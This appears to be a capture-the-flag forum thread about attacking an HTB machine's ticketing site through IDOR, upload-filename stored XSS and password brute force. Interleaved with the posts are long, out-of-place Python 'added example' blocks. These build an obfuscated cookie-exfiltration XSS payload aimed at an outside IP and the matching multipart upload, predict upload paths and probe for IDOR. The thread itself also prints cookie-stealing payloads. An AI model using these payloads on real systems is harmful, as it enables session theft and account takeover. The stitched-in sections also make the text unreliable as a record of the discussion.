Posts: 219
Threads: 14
Joined: Apr 2024
I used it on both SSH ports also... Lol, this machine is hard, not medium.
Posts: 67
Threads: 3
Joined: Jul 2024
Yeah, I looked into a few options for command replacement as well, or chaining the ping command with something else; not much luck so far, but maybe it's possible.
I tried the first bit of rockyou for SSH brute force as well.
Posts: 124
Threads: 1
Joined: Apr 2024
(Aug 03, 2024, 09:41 PM)Anaunimans Wrote: IDOR in creating comments.
IDOR in deleting files.
Stored XSS in file name.
Try `<svg onload=alert()>.zip`:
```
Content-Disposition: form-data; name="attachment"; filename="<svg onload=alert()>.zip"
Content-Type: application/zip
```
XSS works.
I thought there might be someone checking/loading tickets 1-5, but no results.
I tried stealing the cookie:
```
<svg onload=eval(atob('dmFyIGk9bmV3IEltYWdlKCk7IGkuc3JjPSJodHRwOi8vMTAuMTAuMTYuNDIvP2Nvb2tpZT0iK2J0b2EoZG9jdW1lbnQuY29va2llKQo='))>.zip
```
Didn't work.
Using fetch I can steal my own cookie, but it's unlikely anyone is looking into these tickets.
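As an added example (not code from the thread or from the target application), the following Python builds the same kind of upload request as the Content-Disposition line above, packs a cookie-beacon script the way the `atob()` filename does, and decodes such a payload back so you can review what a captured upload would execute. The field name `attachment` and the `.zip` extension are taken from the thread; the collector URL is an assumption, and no endpoint is contacted, so it runs offline.

```python
"""Stored XSS via an upload's filename: build the payload and the request.

Added example for this thread, not code from the original posts. The
form field name "attachment" and the .zip extension come from the thread;
the collector URL is an assumption (your own listener goes there).
"""
import base64
import uuid

# The atob() payload posted in the thread (constructed copy, decoded below).
THREAD_PAYLOAD = ("<svg onload=eval(atob('dmFyIGk9bmV3IEltYWdlKCk7IGkuc3JjPSJodHRwOi8v"
                  "MTAuMTAuMTYuNDIvP2Nvb2tpZT0iK2J0b2EoZG9jdW1lbnQuY29va2llKQo='))>.zip")


def exfil_js(collector_url: str) -> str:
    """JavaScript that beacons document.cookie (base64) to collector_url via an <img> load."""
    return f'var i=new Image();i.src="{collector_url}?cookie="+btoa(document.cookie)'


def xss_filename(js: str, ext: str = "zip") -> str:
    """Wrap JS in an <svg onload=eval(atob(...))> tag usable as a file name.

    Base64 keeps quotes, colons and slashes out of the filename; the thread
    reports that forward slashes break the upload otherwise.
    """
    b64 = base64.b64encode(js.encode()).decode()
    return f"<svg onload=eval(atob('{b64}'))>.{ext}"


def multipart_upload(field: str, filename: str, content: bytes,
                     content_type: str = "application/zip",
                     boundary: str = "") -> tuple:
    """Build a multipart/form-data body carrying the crafted filename.

    Returns (Content-Type header value, body bytes). The filename goes
    verbatim into Content-Disposition, exactly as in the thread's request.
    """
    boundary = boundary or uuid.uuid4().hex
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


def decode_payload(filename: str) -> str:
    """Recover the JavaScript from an atob() filename payload, e.g. when reviewing
    what a captured upload would actually execute in a viewer's browser."""
    start = filename.index("atob('") + len("atob('")
    end = filename.index("'", start)
    return base64.b64decode(filename[start:end]).decode()


if __name__ == "__main__":
    name = xss_filename(exfil_js("http://10.10.16.42/"))
    # Constructed body: a minimal empty zip (22-byte end-of-central-directory record).
    ctype, body = multipart_upload("attachment", name, b"PK\x05\x06" + b"\x00" * 18)
    print(ctype)
    print(body.decode(errors="replace"))
    print(decode_payload(THREAD_PAYLOAD))
```

The body is what you would send as the POST payload with the returned Content-Type header; the beacon only fires if someone whose browser renders the stored filename actually opens the ticket, which is the part the thread could not confirm.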
Posts: 219
Threads: 14
Joined: Apr 2024
Aug 03, 2024, 10:19 PM
(This post was last modified: Aug 03, 2024, 10:20 PM by osamy7593.)
Anyone wanna join my team in HTB? DM me. The team was created 3 days ago and our rank
is 60... Minimum required rank: Pro Hacker... If you've been accepted I will enter you
in our Discord server... When you DM, send your HTB username.
Posts: 67
Threads: 3
Joined: Jul 2024
(Aug 03, 2024, 10:03 PM)bestmajor Wrote: (Aug 03, 2024, 10:01 PM)osamy7593 Wrote: Anyone tried a zzinter brute force on the password?
Used hydra for brute-forcing the web password... no success.
(Aug 03, 2024, 10:12 PM)jsvensson Wrote: (Aug 03, 2024, 09:41 PM)Anaunimans Wrote: [...]
I think the idea of stealing the cookie of the user who made the tickets on the admin panel is smart, but not sure how to accomplish that.
Posts: 19
Threads: 1
Joined: Jun 2024
I was able to use this to get the .zip file XSS to ping back to my web server, so I put one in each of the tickets to see if it'd at least come back before modifying it to grab the cookie, but nothing so far. It uses HTML entity encoding since the forward slashes seem to break it.
<IMG SRC=//10.10.x.x:x+'document.cookie'>
Posts: 33
Threads: 3
Joined: Sep 2023
Aug 03, 2024, 11:05 PM
(This post was last modified: Aug 03, 2024, 11:07 PM by andy1.)
https://github.com/M507/CVE-2021-23017-PoC - you have to be able to send spoofed DNS requests to nginx; not sure if this can be used.
https://nvd.nist.gov/vuln/detail/CVE-2021-23017
Potential UDP port 68 found in the UDP scan.
Posts: 44
Threads: 0
Joined: Apr 2024
The FTP protocol gives some feedback, but remote includes are disabled:
http://itrc.ssg.htb/?page=ftp://xxx:yyy@ip:port/file
Posts: 44
Threads: 0
Joined: Apr 2024
(Aug 03, 2024, 11:13 PM)insect1285 Wrote: I wonder if, because the hash function is always the same, we can reference an upload based on a guessed hash of a file name for the other tickets. Maybe `malware.zip` and find the hash - then try `/uploads/<malware hash>.zip`?
Anyone looked into that yet?
It's not the filename hash, bro, it's a checksum over the content.
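If the stored name really is a digest of the file's bytes rather than of its name, the practical consequence is that guessing names gets you nothing, while reproducing another user's content does. The Python below, an added example and not the ITRC application's code, first identifies which digest the server uses from a file you uploaded yourself, then derives the candidate path for any content you can reproduce. The `/uploads/<digest>.<ext>` layout is an assumption taken from the thread; the sample bytes and observed path are constructed.

```python
"""Predicting upload paths when the stored name is a checksum of the content.

Added example, not the ITRC application's code. The /uploads/<digest>.<ext>
layout is an assumption based on the thread; only the digest algorithm is
unknown, so it is inferred from a file you uploaded yourself.
"""
import hashlib
import os

ALGORITHMS = ("md5", "sha1", "sha256")


def infer_hash_algorithm(observed_name: str, content: bytes):
    """Given the stored name of your own upload and its bytes, return which
    algorithm produced it, or None if the name is not a plain content digest."""
    stem = os.path.splitext(os.path.basename(observed_name))[0].lower()
    for alg in ALGORITHMS:
        if hashlib.new(alg, content).hexdigest() == stem:
            return alg
    return None


def upload_path_candidates(content: bytes, ext: str, alg: str = None,
                           base: str = "/uploads") -> dict:
    """Candidate paths for a file whose content you can reproduce.
    Restrict to one algorithm once infer_hash_algorithm() has identified it."""
    algs = (alg,) if alg else ALGORITHMS
    return {a: f"{base}/{hashlib.new(a, content).hexdigest()}.{ext}" for a in algs}


if __name__ == "__main__":
    mine = b"hello"                                              # constructed: bytes of a file you uploaded
    observed = "/uploads/5d41402abc4b2a76b9719d911017c592.zip"  # constructed: what the server named it
    alg = infer_hash_algorithm(observed, mine)
    # Another user's attachment is reachable only if you can reproduce its bytes
    # (e.g. a public template they attached); renaming a file never changes the digest.
    print(alg, upload_path_candidates(b"public template bytes", "zip", alg))
```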
Posts: 12
Threads: 0
Joined: Jun 2024
(Aug 03, 2024, 08:08 PM)spamdegratis5 Wrote: I was thinking the same; if you try to access the ticket page without the id parameter, you get this error:
```
<div class="main"><br />
<b>Warning</b>: Undefined array key "id" in <b>/var/www/itrc/ticket.php</b> on line <b>5</b><br />
<script>window.location = '/';</script>
```
Also there is a db.php file.
Edit: oh, you meant create_comment; it seems vulnerable to IDOR, at least the response is {"status":"success"}.
(Aug 03, 2024, 11:26 PM)insect1285 Wrote: Closed tickets hint at other servers. Maybe need to track those down? Or find their specific pages?
```
Ticket ID  Subject                                       Status
1          Need SSH Access to HR Server                  closed
2          Decommission ITRC SSH Certificate             closed
4          Please provision access to marketing servers  closed
```
How were you able to get the data of the closed ones?
I just got back on, but earlier I was able to close all the tickets regardless of ID or ownership; I tested it with separate accounts. The same goes for commenting on whatever ID you like, as already mentioned earlier in this thread.
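The closing-any-ticket and commenting-on-any-ID behaviour reported in this thread is a textbook object-level authorization failure. As an added example, not the ITRC application's code, the Python below models the vulnerable handlers beside fixed ones that check ownership, plus the probe you run from a second, low-privileged account to confirm the IDOR. The user names, ticket table and JSON-style responses are constructed.

```python
"""IDOR on ticket actions: the vulnerable handler beside the fixed one.

Added example, not the ITRC application's code. Users, tickets and the
JSON-style responses are constructed; the handlers model what the thread
reports (any account can comment on or close any ticket ID) and the
object-level authorization check that prevents it.
"""
from dataclasses import dataclass, field


@dataclass
class Ticket:
    id: int
    owner: str
    status: str = "open"
    comments: list = field(default_factory=list)


def make_tickets() -> dict:
    """Constructed sample data: tickets owned by two users and by admin."""
    return {1: Ticket(1, "alice", "closed"),
            2: Ticket(2, "bob"),
            3: Ticket(3, "admin")}


def _authorized(user: str, ticket: Ticket, admins=("admin",)) -> bool:
    """Object-level check: the caller owns the ticket or is an admin."""
    return ticket.owner == user or user in admins


# --- vulnerable: trusts the client-supplied id, never asks who owns it ---

def create_comment_vulnerable(user, ticket_id, text, db):
    t = db.get(ticket_id)
    if t is None:
        return {"status": "error"}
    t.comments.append((user, text))
    return {"status": "success"}


def close_ticket_vulnerable(user, ticket_id, db):
    t = db.get(ticket_id)
    if t is None:
        return {"status": "error"}
    t.status = "closed"
    return {"status": "success"}


# --- fixed: authorization on every id the client supplies ---

def create_comment_fixed(user, ticket_id, text, db):
    t = db.get(ticket_id)
    if t is None or not _authorized(user, t):
        return {"status": "error"}      # same answer for missing and foreign ids
    t.comments.append((user, text))
    return {"status": "success"}


def close_ticket_fixed(user, ticket_id, db):
    t = db.get(ticket_id)
    if t is None or not _authorized(user, t):
        return {"status": "error"}
    t.status = "closed"
    return {"status": "success"}


def probe_idor(action, user, ids, db) -> list:
    """Enumerate ids from a second, low-privileged account and return those the
    action succeeded on without ownership: the test described in the thread."""
    hits = []
    for i in ids:
        t = db.get(i)
        if t is not None and not _authorized(user, t):
            if action(user, i, db)["status"] == "success":
                hits.append(i)
    return hits


if __name__ == "__main__":
    print("vulnerable:", probe_idor(close_ticket_vulnerable, "bob", range(1, 6), make_tickets()))
    print("fixed:     ", probe_idor(close_ticket_fixed, "bob", range(1, 6), make_tickets()))
```

Against a live target the probe is the same loop with the action replaced by an HTTP call from the second account's session; any `{"status":"success"}` on an id that account does not own is the finding.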